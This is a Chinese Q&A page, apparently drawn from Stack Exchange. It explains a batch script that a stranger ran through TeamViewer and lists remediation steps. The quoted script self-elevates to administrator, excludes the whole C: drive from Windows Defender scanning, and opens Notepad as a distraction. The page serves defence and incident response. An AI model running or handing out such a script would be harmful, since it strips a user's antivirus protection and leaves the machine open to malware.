You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

求助:陌生人员通过TeamViewer运行的Bat代码作用及防护措施

分析这段Bat代码的作用及后续防护方案

代码作用拆解

先贴出对方运行的Bat代码:

@echo off
if not "%1"=="am_admin" (powershell start -verb runas '%0' am_admin & exit /b)
start cmd /c "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:""
start notepad.exe

逐行解析:

  • @echo off:关闭命令行的命令回显,让你看不到后台在执行什么操作,刻意隐藏操作痕迹。
  • 第二行:检测当前脚本是否以管理员权限运行,若不是则调用PowerShell以管理员身份重启脚本——这一步是为了获取系统最高权限,确保后续恶意配置能顺利生效。
  • 第三行:后台启动PowerShell执行Add-MpPreference -ExclusionPath "C:",直接把整个C盘加入Windows Defender的扫描排除列表。这意味着Windows Defender会彻底放弃对C盘所有文件的病毒查杀,后续对方植入的恶意软件可以在C盘随意运行,不会被拦截。
  • start notepad.exe:打开记事本转移你的注意力,让你误以为远程操作只是打开了个记事本,不会察觉到后台偷偷修改了杀毒软件的核心配置。

后续防护措施

  • 立即移除Windows Defender的C盘排除项:打开Windows Defender安全中心 → 病毒和威胁防护 → 管理设置 → 排除项,找到路径为C:\的条目直接删除,恢复杀毒软件的完整扫描能力。
  • 执行全系统病毒扫描:用Windows Defender或你信任的第三方杀毒软件(比如卡巴斯基、Bitdefender)对整个硬盘做全量扫描,排查残留的恶意程序。
  • 更换所有敏感账号密码:包括Facebook账号、邮箱、网银、本地电脑管理员账号等,对方可能已经通过远程连接记录了你的键盘输入或屏幕内容,必须全部更换强密码。
  • 整改远程工具设置:如果还要用TeamViewer这类远程工具,关闭无人值守访问,设置复杂的连接密码,只在需要的时候临时开启远程权限,用完立刻关闭,绝对不要随便给陌生人远程权限。
  • 检查系统权限:打开计算机管理 → 本地用户和组 → 组 → 管理员组,确认没有陌生账号被添加进来;同时检查Windows Defender的防护规则,确保没有其他被篡改的设置。
  • 监控系统异常:接下来几天留意任务管理器里的进程、CPU内存占用,看看有没有陌生程序自动启动,或者不明的网络连接。
  • 必要时重装系统:如果扫描后还是发现异常,或者不确定有没有清理干净,最稳妥的方式是格式化系统盘,重装纯净版Windows,备份重要数据前一定要先确认数据没被感染。

内容的提问来源于stack exchange,提问作者Fahad Mirza

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.07.28 21:33:27